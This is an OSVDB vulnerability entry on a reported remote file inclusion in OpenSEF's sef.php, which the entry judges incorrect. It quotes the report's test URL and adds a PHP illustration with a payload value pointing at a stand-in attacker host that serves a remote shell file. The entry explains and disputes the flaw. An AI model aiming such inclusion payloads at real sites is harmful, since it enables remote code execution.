OpenSEF for Joomla sef.php mosConfig_absolute_path Variable Remote File Inclusion

2006-07-15T03:08:11
ID OSVDB:29003
Type osvdb
Reporter O.U.T.L.A.W.(outlaw@aria-security.net)
Modified 2006-07-15T03:08:11

Description

Vulnerability Description

OpenSEF has been reported to contain a flaw that may allow a remote attacker to execute arbitrary code. The issue was claimed to be a remote file inclusion in the sef.php script, caused by the 'mosConfig_absolute_path' variable being used in an include path without validation, so that a request parameter of the same name would control which file is loaded. However, subsequent examination shows that the variable is assigned in another file before sef.php uses it, so any value supplied in the request is overwritten and cannot be manipulated by an attacker.

Solution Description

The vulnerability reported is incorrect. No solution required.

Short Description

OpenSEF has been reported to contain a remote file inclusion flaw in the sef.php script via the 'mosConfig_absolute_path' variable. Subsequent examination shows that the variable is assigned in another file before it is used and cannot be manipulated by an attacker.

Manual Testing Notes

http://[target]/sef.php?mosConfig_absolute_path=SHELL

The URL above is the test case given in the original report. Because 'mosConfig_absolute_path' is assigned before sef.php uses it, the request parameter is overwritten and the request does not cause the supplied path to be included.
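The following is an added illustration of the mechanism behind the dispute, not OpenSEF's own code. It contrasts the pattern the report assumed (the variable is used in an include path without ever being assigned, so a request parameter becomes its value) with the pattern the examination found (a file processed earlier assigns the variable, so the request value is overwritten). The site root, file names and the helper function names are assumed for the demonstration.

```php
<?php
// Added illustration, not OpenSEF's own code. Shows why a request parameter
// named mosConfig_absolute_path can only steer an include when the script uses
// the variable before anything assigns it. Paths and names are assumed.

const SITE_ROOT = '/var/www/joomla';   // assumed value a real configuration file would set

// Emulates register_globals=On, where each request parameter is imported as a
// PHP global before the script body runs: an otherwise unassigned
// $mosConfig_absolute_path starts out holding the attacker's string.
function registerGlobalsValue(array $request): string
{
    return $request['mosConfig_absolute_path'] ?? '';
}

// Pattern the original report assumed: the variable is used in the include
// path without ever having been assigned, so the attacker's prefix survives.
function includePathWhenNeverAssigned(array $request): string
{
    $mosConfig_absolute_path = registerGlobalsValue($request);
    return $mosConfig_absolute_path . '/includes/sef.php';
}

// Pattern the OSVDB analysis describes: a file processed earlier assigns the
// variable from the site configuration, overwriting whatever register_globals
// imported, so the request parameter never reaches the include.
function includePathWhenAssignedFirst(array $request): string
{
    $mosConfig_absolute_path = registerGlobalsValue($request);
    $mosConfig_absolute_path = SITE_ROOT;   // what the earlier file does
    return $mosConfig_absolute_path . '/includes/sef.php';
}

// Would the computed include path fetch a remote resource? (allow_url_fopen /
// allow_url_include aside, this is the condition the report's
// ?mosConfig_absolute_path=SHELL URL relies on.)
function isRemoteInclude(string $path): bool
{
    return (bool) preg_match('#^[a-z][a-z0-9+.-]*://#i', $path);
}

// Constructed request mirroring the advisory's test URL.
$request = ['mosConfig_absolute_path' => 'http://attacker.example/shell.txt?'];

$cases = [
    'never assigned' => includePathWhenNeverAssigned($request),
    'assigned first' => includePathWhenAssignedFirst($request),
];
foreach ($cases as $case => $path) {
    printf("%-15s %-55s remote=%s\n", $case, $path, isRemoteInclude($path) ? 'yes' : 'no');
}
```

To confirm the analysis against an installed copy, locate the line in sef.php that uses $mosConfig_absolute_path in an include or require and the line (in sef.php or in a file it loads first) that assigns it; the report only holds if the use precedes every assignment on that code path.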

References:

Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,77301.0.html
Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0458.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0392.html
CVE ID: CVE-2006-4320
Bugtraq ID: 19600